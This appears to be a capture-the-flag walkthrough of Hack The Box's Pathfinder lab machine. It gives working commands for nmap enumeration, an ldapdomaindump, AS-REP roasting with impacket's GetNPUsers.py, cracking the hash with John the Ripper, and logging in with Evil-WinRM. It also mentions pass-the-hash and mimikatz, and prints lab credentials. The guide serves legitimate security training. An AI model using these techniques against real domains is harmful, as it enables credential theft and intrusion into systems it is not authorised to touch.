After the Shield Walkthrough, Here I'm with Pathfinder box and this is the last box you can play if you are a free member on HTB platform. Let's hack and grab the flags.
As I mentioned before, the starting point machines are a series of 9 easily rated machines that should be rooted in sequence. So it means, if you need to go through this box, first of all you must have a complete Shield machine.
Enough talks, 🥱 Let’s Get It Started 🐱💻
Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags! 🐱👤
00. Start Machine …
To start machine, just click "Join Machine".
Then you can see the IP address for that machine. Usually it is 10.10.10.30 🤠
Before going enumeration steps we can simply ping to the IP address and check our VPN connection and whether the machine is alive. Sometimes the machines might "Disable" ping requests from passing through the firewall. But in most cases ping will be a success! 🙂
-n : Never do DNS resolution-vv : Extra verbosity--open : Output only open ports-p- : Full TCP ports range (65535)-T4 : Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network
Here is the output 👇
└─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.30Discovered open port 389/tcpon10.10.10.30Discovered open port 49676/tcpon10.10.10.30SYN Stealth Scan Timing: About 72.99% done; ETC: 11:27 (0:00:56 remaining)Discovered open port 49714/tcpon10.10.10.30Discovered open port 49664/tcpon10.10.10.30Discovered open port 49667/tcpon10.10.10.30Discovered open port 636/tcpon10.10.10.30Discovered open port 88/tcpon10.10.10.30Discovered open port 9389/tcpon10.10.10.30Discovered open port 49666/tcpon10.10.10.30Discovered open port 3268/tcpon10.10.10.30Completed SYN Stealth Scan at11:26, 173.96s elapsed (65535 total ports)Nmap scan report for10.10.10.30Host is up, received echo-reply ttl 127 (0.24s latency).Scanned at2021-05-2111:23:43 EDT for 175sNot shown: 65466 closed ports, 45 filtered portsReason: 65466 resets and45no-responsesSome closed ports may be reported as filtered due to--defeat-rst-ratelimitPORT STATESERVICE REASON53/tcpopen domain syn-ack ttl 12788/tcpopenkerberos-sec syn-ack ttl 127135/tcpopen msrpc syn-ack ttl 127139/tcpopen netbios-ssn syn-ack ttl 127389/tcpopen ldap syn-ack ttl 127445/tcpopen microsoft-ds syn-ack ttl 127464/tcpopen kpasswd5 syn-ack ttl 127593/tcpopenhttp-rpc-epmap syn-ack ttl 127636/tcpopen ldapssl syn-ack ttl 1273268/tcpopen globalcatLDAP syn-ack ttl 1273269/tcpopen globalcatLDAPssl syn-ack ttl 1275985/tcpopen wsman syn-ack ttl 1279389/tcpopen adws syn-ack ttl 12747001/tcpopen winrm syn-ack ttl 12749664/tcpopen unknown syn-ack ttl 12749665/tcpopen unknown syn-ack ttl 12749666/tcpopen unknown syn-ack ttl 12749667/tcpopen unknown syn-ack ttl 12749673/tcpopen unknown syn-ack ttl 12749676/tcpopen unknown syn-ack ttl 12749677/tcpopen unknown syn-ack ttl 12749683/tcpopen unknown syn-ack ttl 12749695/tcpopen unknown syn-ack ttl 12749714/tcpopen unknown syn-ack ttl 127Readdata files from: /usr/bin/../share/nmapNmap done: 1 IP address (1 host up) scanned in174.50secondsRaw packets sent: 85085 (3.744MB) | Rcvd: 80313 (3.213MB)
This is why I recommend to scan all the ports. Here you can see there are so many ports open and by looking at the open ports (ldap,kpasswd5 & kerberos) we can definitely say that this machine is an Active Directory machine. We haven't touched that area before. Sharp your Active Directory enumeration skills, it will worth if you are willing to try Red Team activities.
Active Directory is a directory service developed by Microsoft for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services. Initially, Active Directory was only in charge of centralized domain management. [Copied from Wikipedia]
01.2 Run Nmap Scripting Engine
To get the best result, we can run the Nmap Scripting Engine for all open ports. Now we know all of the open ports and therefore we can point out and run the script engine as fast as possible.
┌──(root💀Hidd3nWiki)-[~/Documents/Pathfinder]└─# nmap -sV -sC -oN DetailPorts.nmap -p 49667,49720,49676,49677,593,139,3269,389,9389,135,3268,49664,464,47001,636,49700,49665,49666,49672,5985,445,53,49683,8810.10.10.30Starting Nmap 7.91 ( https://nmap.org ) at2021-05-2111:43 EDTNmap scan report for10.10.10.30Host is up (0.23s latency).PORT STATESERVICEVERSION53/tcpopen domain Simple DNS Plus88/tcpopenkerberos-sec Microsoft WindowsKerberos (servertime: 2021-05-2122:54:30Z)135/tcpopen msrpc Microsoft Windows RPC139/tcpopen netbios-ssn Microsoft Windows netbios-ssn389/tcpopen ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)445/tcpopen microsoft-ds?464/tcpopen kpasswd5?593/tcpopen ncacn_http Microsoft Windows RPC overHTTP1.0636/tcpopen tcpwrapped3268/tcpopen ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)3269/tcpopen tcpwrapped5985/tcpopenhttp Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found9389/tcpopen mc-nmf .NET Message Framing47001/tcpopenhttp Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found49664/tcpopen msrpc Microsoft Windows RPC49665/tcpopen msrpc Microsoft Windows RPC49666/tcpopen msrpc Microsoft Windows RPC49667/tcpopen msrpc Microsoft Windows RPC49672/tcp closed unknown49676/tcpopen ncacn_http Microsoft Windows RPC overHTTP1.049677/tcpopen msrpc Microsoft Windows RPC49683/tcpopen msrpc Microsoft Windows RPC49700/tcp closed unknown49720/tcp closed unknownService Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:|_clock-skew: 7h11m13s| smb2-security-mode:| 2.02:|_ Message signing enabledandrequired| smb2-time:| date: 2021-05-21T22:55:29|_ start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in80.98seconds
As it is an Active Directory machine, our enumeration steps will be different. ldap enumeration is pretty cool if you use BloodHound because it gives us graphical information. But it's already done in official writeup. So let's begin with my way. 😎😎
01.3 Discover more on domain
Nmap tells us the domain (Domain: MEGACORP) we are in. And don't forget we had some credentials from Shield machine. sandra:Password1234! First we can tryout with ldapdomaindump tool. Let's start.
-u : DOMAIN\username for authentication, leave empty for anonymous authentication-p : Password or LM:NTLM hash, will prompt ifnot specified-o : Directory in which the dump will be saved (default: current)--no-json : Disable JSON output--no-grep : Disable Greppable output
As you can see there are a lot of HTML files here. Among them, first I choose domain_users.html You can view through it from the browser. But instead of that, I will use html2texttool. You can simply install it by typing sudo apt-get install html2text . However the result will be like this. 👇👇
There are 5 accounts here. Guest, Administrator and krbtgt accounts are the default accounts. sandra and svc_bes accounts are user created ones. As you can see, I highlighted the svc_bes account because it has enabled theDONT_REQ_PREAUTH flag.
Now I'll simply explain what the kerberos authentication is. If you need to know what DONT_REQ_PREAUTH flag means, you must understand the kerberos authentication before.
This draft shows you how the normal authentication process. But if DONT_REQ_PREAUTH flag is set, second and third steps of the process can be missed. That means you can directly request the service ticket. Click here if you need more information about kerberos authentication.
02. Foothold
Now we are going to use impacket'sGetNPUsers.py script to grab the request service ticket.
If you don't have that script installed on your computer follow below command to install it.
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py MEGACORP.LOCAL/svc_bes -dc-ip 10.10.10.30 -request -no-pass -format john
-request : Requests TGT for users and output them in JtR/hashcat format (default False)-no-pass : Don't ask for password (useful for Kerberos authentication)-dc-ip : IP Address of the domain controller.-format : Format to save the AS_REQ of users without pre-authentication. Default is hashcat
Output will be like this. 👇👇
We grabbed the ticket. Now it's time to powerup John the Ripper and crack the hash. First of all copy that hash to file then run the john.🤠🤠
john hash--wordlist=/usr/share/wordlists/rockyou.txt
We got the password for svc_bes !!!
svc_bes : Sheffield19
Now since we have the username and password, we can use Evil-WinRM tool. You can simply install it by typing gem install evil-winrm and hit enter, then the tool will be installed to your machine. 😎😎
Now, don't you have a question ❓ We already have the username and password for user sandra. Why didn't we use it? It's because there is nothing inside that account. It's just a simple user account.
As you can see, We have NTLM hash for the Administrator account. We can use this to perform Pass The Hash attack and gain elevated access to the system. Also we can use Impacket's psexec.py for this too.
Since these boxes are all connected, we are going to grab the local admin hash too. So let’s upload mimikatz. You can download mimikatz tool from here and upload it to the box using python demon web server.